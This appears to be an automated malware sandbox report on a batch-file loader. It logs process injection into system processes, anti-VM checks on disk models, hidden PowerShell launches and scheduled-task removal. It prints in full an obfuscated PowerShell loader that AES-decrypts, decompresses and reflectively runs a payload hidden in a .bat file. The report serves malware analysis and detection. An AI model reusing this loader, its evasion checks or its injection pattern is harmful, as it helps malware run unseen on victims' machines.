Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 277167A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 277167D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 22123BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 22123BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 13F081C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 13F08E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FD17760000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FD186A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 30B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 34D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2A3D0DE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 28FF0B90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2A3D0F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 24D03D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21336150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 28FF0B90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 196FB050000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 196FB050000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2A4E5670000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1FFFD320000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8C8FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8CB040000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350370000

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:quvobnaugmmc{param([outputtype([type])][parameter(position=0)][type[]]$uwmlljvvwbvuvd,[parameter(position=1)][type]$qjfzfiqcry)$wljbmwfhupi=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+'f'+'l'+''+[char](101)+'c'+'t'+''+[char](101)+''+'d'+''+[char](68)+'e'+[char](108)+'e'+[char](103)+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+[char](101)+''+[char](109)+''+[char](111)+'r'+[char](121)+''+[char](77)+''+[char](111)+''+[char](100)+''+'u'+'l'+[char](101)+'',$false).definetype(''+[char](77)+'y'+'d'+'e'+'l'+''+'e'+''+[char](103)+'a'+[char](116)+'ety'+[char](112)+'e',''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+'l'+''+[char](105)+''+[char](99)+''+','+''+[char](83)+''+[char](101)+''+[char](97)+''+[char](108)+''+[char](101)+'d'+[char](44)+''+'a'+''+'n'+'s'+[char](105)+''+'c'+''+[char](108)+''+[char](97)+''+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+[char](108)+'a'+[char](115)+''+[char](115)+'',[multicastdelegate]);$wljbmwfhupi.defineconstructor(''+[char](82)+'t'+'s'+''+[char](112)+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+'na'+[char](109)+''+'e'+','+[char](72)+''+[char](105)+''+[char](100)+'e'+'b'+''+'y'+''+'s'+''+[char](105)+''+[char](103)+',pu'+'b'+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$uwmlljvvwbvuvd).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+'i'+[char](109)+''+'e'+''+','+''+[char](77)+''+[char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[char](100)+'');$wljbmwfhupi.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](111)+''+[char](107)+'e',''+[char](80)+'ubl'+[char](105)+''+[char](99)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+'e'+''+[char](66)+''+'y'+''+[char](83)+''+[char](105)+''+'g'+','+'n'+'ew'+'s'+''+[char](108)+''+[char](111)+'t'+','+''+[char](86)+''+'i'+'rt'+'u'+''+[char](97)+''+[char](108)+'',$qjfzfiqcry,$uwmlljvvwbvuvd).setimplementationflags(''+'r'+''+[char](117)+'n'+'t'+''+'i'+'m'+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+'g'+[char](101)+''+[char](100)+'');write-output $wljbmwfhupi.createtype();}$ulnmlpdbsuvqn=([appdomain]::currentdomain.getassemblies()\|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+[char](101)+''+[char](109)+'.d'+[char](108)+''+[char](108)+'')}).gettype(''+[char](77)+''+[char](105)+'c'+[char](114)+''+'o'+'s'+[char](111)+'f'+[char](116)+''+[char](46)+'wi'+'n'+'3'+'2'+''+[char](46)+''+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+'n'+'a'+'t'+'i'+''+[char](118)+'em'+[char](101)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

37_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

37_2_0000000140002300

Source: dwm.exe, 00000029.00000000.2486830471.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.3084591324.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
